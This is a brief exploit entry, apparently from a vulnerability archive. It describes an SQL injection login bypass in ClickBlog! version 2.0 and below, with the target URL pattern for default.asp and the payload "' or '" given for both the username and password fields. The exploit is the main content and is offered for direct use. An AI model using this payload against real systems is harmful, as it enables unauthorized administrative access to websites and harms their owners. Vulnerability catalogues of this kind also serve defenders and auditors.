ClickBlog! versions 2.0 and below suffer from a SQL injection vulnerability that allows for login bypass.
cf7533d49e3535f4a6fd852922e644ab836a8935d0126c7b898ade9b2bec450e
ENGLISH
# Title : ClickBlog! <= v2.0 (default.asp) Admin ByPASS SQL Injection
# Author : ajann
# Exploit;
//Before join login page
http://[target]/[path]/default.asp
Username : ' or '
Password : ' or ' and Login Ok
# ajann,Turkey